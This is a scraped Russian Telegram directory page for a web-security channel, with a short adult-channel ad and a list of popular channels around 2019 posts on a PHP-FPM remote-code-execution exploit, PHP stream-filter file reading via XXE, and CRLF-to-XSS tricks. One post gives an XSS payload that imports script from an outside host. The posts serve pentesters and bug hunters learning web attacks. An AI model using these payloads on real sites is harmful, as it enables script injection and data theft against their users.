🔥ЛУЧШИЙ ТГ КАНАЛ 18+ У НАС🔥


@erostiktokos

🔞Разнообразный контент
❤️ Лучшие девушки
✅ Переходи и убедись сам

/ категории / Блоги /

Кавычка



@webpwn
6724 +4

Уязвимости и атаки на веб-приложения. Без рекламы. Чат об одинарных, иногда даже двойных кавычках - @WebPwnChat '


PPD: 0.08, PV: 15.41K, DV: 1179, ERR: 229%

ТОП каналов

Durov's Channel


@durov
334.98K -82

This is where I post thoughts about Telegram in a slightly less formal and more direct way than in the official Telegram blog.

Артемий Лебедев


@temablog
200.18K +321

Адрес для связи и по вопросам рекламы: tema@tema.ru ⚠️ Важно! Оплата только через форму: http://www.tema.ru/money-huyaney/ ⚠️ Или по безналу - invoice@artlebedev.ru

tenderlybae


@plsbetenderly
195.73K -537

Стримы тут — twitch.tv/tenderlybae Реклама - @meadowmedia

Семейка ботов


@familybots
191.34K +467

Пишем про наших ботов @text4instabot, @SaveAsBot, @InstaPoliceRobot, а также про Instagram и другие соцсети. По всем вопросам: @Supermanoff

𝐑𝐢𝐓𝐚 𝐄𝐛𝐳𝐞𝐄𝐯𝐚


@RitaEbzeeva
189.95K +347

Обратная связь : glavnyye@bk.ru Марина -@BRRSR Читайте нас тут- @moscownews_24

Varlamov.ru


@varlamov
172.18K -145

Илья Варламов. Make Russia warm again! Подписывайтесь на канал: https://www.youtube.com/c/ivarlamov Также новостной канал @varlamov_news">@varlamov_news бот @VarlamovBot реклама reklama@varlamov.me Рубрика "Мне пишут": @varlamov_mail

Павел Дуров


@durov_russia
157.12K -15

Основной канал – @durov

Недавние публикации

6852

Отличный эксплоит с отличным названием PHuiP-FPizdaM!

В версиях php 7+ (заканчивая вчерашней) в парсинге fastcgi есть бинарный баг, который позволяет перетереть FASTCGI переменные, что позволяет выставлять php.ini опции, что в свою очередь дает возможность выполнить код.

Для успешной эксплутатации нужно, чтобы в связке php-fpm + nginx конфиг последнего позволял передать пустое значение PATH_INFO (все предусловия написаны в README.md эксплоита).

Подробности, примеры и прочие фишки будут на ZN.


16:04 22.10.19
8575

Что если вы контролируете путь к файлу для чтения в PHP, но результат отображается только при соответствии каким-то условиям?

Например, это может быть проверка через getimagesize() на то, что прочитанный файл является изображением. Также содержимое может выводиться не целиком, а лишь частично.
Ещё ситуация: у вас XXE, и вы хотите читать файлы с угловыми скобками (те же PHP-скрипты). Просто так это зачастую не сделать из-за нарушения синтаксиса XML.

На помощь приходят обёртки и фильтры:
https://www.php.net/manual/ru/filters.convert.php
https://www.php.net/manual/ru/filters.compression.php
https://www.php.net/manual/ru/filters.string.php
https://www.php.net/manual/ru/migration53.new-stream-filters.php

PHP позволяет на лету преобразовывать содержимое, прочитанное из ресурса (как из файловой системы, так и по сети).
Например, вот так можно прочитать веб-страницу, на лету убрать из неё теги, сжать с zlib и закодировать в base64:
php://filter/read=string.strip_tags|zlib.deflate|convert.base64-encode/resource=http://localhost:1337/secret.xml

Комбинируя фильтры, можно зачастую извлечь данные, которые приложение не хотело отдавать из-за валидации в XML-парсере или на уровне скрипта.


13:01 10.10.19
8962

Часто при использовании Burp Repeater'а хочется посмотреть историю отправленных через него запросов - для этого удобно использовать плагин Burp Suite Logger++.

https://github.com/nccgroup/BurpSuiteLoggerPlusPlus


20:08 20.09.19
11.38K

Не секрет, что Telegram поддерживает форматирование. Мессенджер поддерживает markdown, к тому же, у него есть горячие клавиши. Например это жирные ( Ctrl/Cmd + B ) или курсивные ( Ctrl/Cmd + I ) буквы.
А еще можно вставлять ссылки. Причем внешне корректные ссылки, такие как https://google.com, хоть и могут отправлять в другое место, но будет отображено предупреждение.

Но ссылки на t.me будут обработаны по-другому. При нажатии сразу будет открываться группа, профиль человека или бот. Для этого нужно выделить текст, нажать Ctrl/Cmd+U и указать ссылку.

Так что аккуратнее с этим. А @durov, спасибо!


18:06 19.09.19
14.79K

PayloadsAllTheThings - коллекция полезной нагрузки ко всему, вот серьёзно.
Тут и вектора атак для CRLF, и к Path Traversal, различные пэйлоады для imagemagic и ffmpeg, XXE, ссылки на разборы и мануалы, даже старый добрый SecLists больше не нужен. Обязателен в коллекции любого bounty hunter'а. А уж сколько заданий в CTF было решено за счёт него!
А чего еще нет, добавляется с помощью комьюнити, подключайтесь!


11:11 01.08.19
13.20K

Чтобы подключить внешний JS на страницу, нужно было либо обращаться к удаленной странице и выполнять ответ. Или хитрить и использовать уже подключенные библиотеки, например $.getScript в Jquery.
Сейчас в Chrome и Safari достаточно использовать функцию import. Например
<img src onerror=import('//bo0om.ru/x/')>
Для ответа у нашего скрипта должен быть настроен CORS, но в этом никакой проблемы нет.


12:12 29.07.19
14.11K

Когда у тебя есть CRLF в заголовке Location при редиректе, ты можешь попробовать превратить CRLF в полноценную XSS.
Браузеры не рендерят тело в ответе, где присутствует перенаправление. Однако, редирект можно прервать и тогда тело отобразится. Как завещал BlackFan:
* Для браузера Chrome необходимо, чтобы сервер вернул пустой заголовок Location.
* Для FF чуть проще, нужно контролировать порт домена, куда происходит редирект, указав unsafe port, например 1 или 22.


11:11 22.07.19